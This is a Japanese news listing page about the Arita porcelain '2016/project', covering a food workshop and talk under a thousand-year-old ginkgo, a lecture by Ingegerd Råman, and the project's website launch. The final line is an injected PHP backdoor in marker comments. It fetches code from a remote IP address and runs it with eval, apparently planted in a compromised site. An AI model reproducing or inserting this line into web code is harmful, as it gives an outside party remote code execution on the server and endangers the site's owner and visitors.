デイリープレス

11月15日(日)、有田の大銀杏の木の下で食のワークショップとトークショー開催!
細川亜衣+出野尚子×INDUBITABLY

磁器発祥の地、有田と世界が繋がる企画「A View From Above」。
今回は、熊本を拠点に活動する料理人の細川亜衣さんと、鹿児島を拠点に独自の世界観で空間を表現するINDUBITABLYが、有田の古い町並みの一角にある樹齢1000年の大銀杏の木の下で、一日だけの特別なレストランをオープン。細川さんが考えた有田の食材を使ったレシピを、参加者みんなで作るワークショップを行います。

news / 2015.11.06

tags: 2016/project, event

午後のトークでは、台湾茶を中心とした茶会を行っている出野尚子さんに、有田周辺・嬉野地域の茶葉を使って特別なお茶を入れていただきます。美味しいお茶とお菓子と共に、地元食材の生産者を迎え、細川さん、
デザイナーの柳原照弘さんの3人が、食、ものづくり、そしてそこにある”ストーリー”について語り合います。
ゆったりととても楽しい1日になると思います。ぜひお越しください! read more

スウェーデンを代表するデザイナー、インゲヤード・ローマン。有田での講演会とワークショップの開催が決定。

Photography by Kenta Hasegawa

news / 2015.09.02

tags: 2016/project, event

スウェーデンを代表するガラスデザイナーであり、陶芸作家としても活躍するインゲヤード・ローマン。
有田焼創業400年事業のひとつ「2016/ project」に参加している彼女は、昨年より有田の窯元を訪れものづくりを続けています。

read more

有田の16の窯元と商社、世界の16のデザイナー 「2016/project」 ウェブサイトオープン!

佐賀県有田町。1616年に泉山で発見された良質な白磁鉱で、日本で初めて磁器生産を始めた山間の小さな町。
東インド会社を通じて有田焼が世界へと大量に渡ったり、戦後の経済成長時には非常に高い生産力を誇るなど、力強く前に進み続けた時代。
しかし訪れたバブル崩壊、生活様式の変化など急速な変化に対応しきれず、売上げは減少を続け、約150の窯元を抱える産業の町・有田は困難な局面を迎えています。

news / 2015.01.22

tags: 2016/project

ブランドの発表は2016年4月のミラノサローネ。
「2016/project」のウェブサイトでは、プロジェクトの進行を通して「有田の今」を随時発信していきます。 read more

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>